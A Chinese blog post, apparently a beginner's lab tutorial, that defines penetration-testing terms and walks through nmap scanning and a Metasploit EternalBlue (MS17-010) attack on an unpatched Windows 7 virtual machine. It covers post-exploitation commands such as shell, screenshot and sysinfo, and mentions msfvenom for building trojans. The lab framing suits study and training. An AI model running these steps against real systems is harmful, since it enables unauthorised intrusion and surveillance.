术语介绍
1、渗透攻击(exploit):指由攻击者或渗透测试者利用一个系统、应用或服务中的安全漏洞,所进行的攻击行为。
2、攻击载荷(payload):是我们期望目标系统在渗透攻击之后去执行的代码
3、shellcode:是在渗透攻击时作为攻击载荷运行的一组机器指令,通常用汇编语言编写
4、模块(Module):指Metasploit框架中所使用的一段软件代码组件,可用于发起渗透攻击或执行某些辅助攻击动作
5、监听器(listener),是在Metasploit中用来等待网络连接的组件
对于反弹shell的一些理解
测试环境搭建:
安装虚拟机Linux kali A
安装虚拟机win7 B (且不进行更新打补丁操作,虽然不知道有没有影响)
两个虚拟机都使用桥接方式,保证两个虚拟机会在同一个网段,即在同一个局域网中。
在主电脑上同时运行这两个虚拟机
在A机:ifconfig,查询A机的IP
在B机:ipconfig /all,查询B机的IP
kali默认带有Metasploit工具,也有简称为msf的,f是framework的缩写
关闭B主机的防火墙,并开启B主机的445、139端口:
开启方法:在windows防火墙的高级设置–>新建入站规则即可
nmap工具的使用
info: 可以在lunux命令行中执行也可以在msf命令环境中执行
查询当前局域网内所有联网主机的状态,可以在A机运行命令:
$ nmap -sn 192.168.157.0/24 -oG online.txt$ cat online.txt | grep -i upOR$ nmap -sn 192.168.157.0/24说明:-sn :进行ping扫描不进行端口扫描
2. 扫描目标机的端口信息:
$ nmap -sV -A -O 192.168.157.143扫描目标机的指定端口445的信息
$ namp -O -p445 192.168.157.143使用msf框架
note:msf框架需要更新到新版本,否则可能会导致需要关闭靶机的防火墙才能进行渗透渗透时不一定能反弹shell,但这不代表你渗透失败,只是没有shell反弹而已,你可以通过其他命令进行验证。
在kali linux的命令行下输入命令调用
$ msfconsole使用命令查看需要渗透的漏洞对应的模块文件search ModuleName
example:
$ search ms17_010_eternablue使用相关模块use ModlueName
example:
$ use exploit/windows/smb/ms17_010_eternablueinfo : 在该模块下,查询使用该模块需要配置的参数信息查询参数信息
$ show options查看模块的完整信息
$ info选择payload作为渗透后的攻击脚本,在此之前使用命令查看可选的payload
# show payloads使用命令设置set payload
$ set payload payload_name执行命令进行渗透:
$ exploit成功黑进去后:
可以使用命令反弹shell
$ shell可以使用命令获取对方的屏幕截图
$ screenshot用于得到目标系统的一些信息
$ sysinfo$ ipconfigOthers Info
msfvenom:
是msfpayload,msfencode的结合体,可利用msfvenom生成木马程序,
并在目标机上执行,在本地监听上线
command:
1、显示所有可执行选择
$ msfvenom2、列出在该系统下能支持的文件格式
$ msfvenom --list formatsarmitage,是Metasploit的可视化界面
3、使用armitage调出
$ armitage---------------------
4932
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
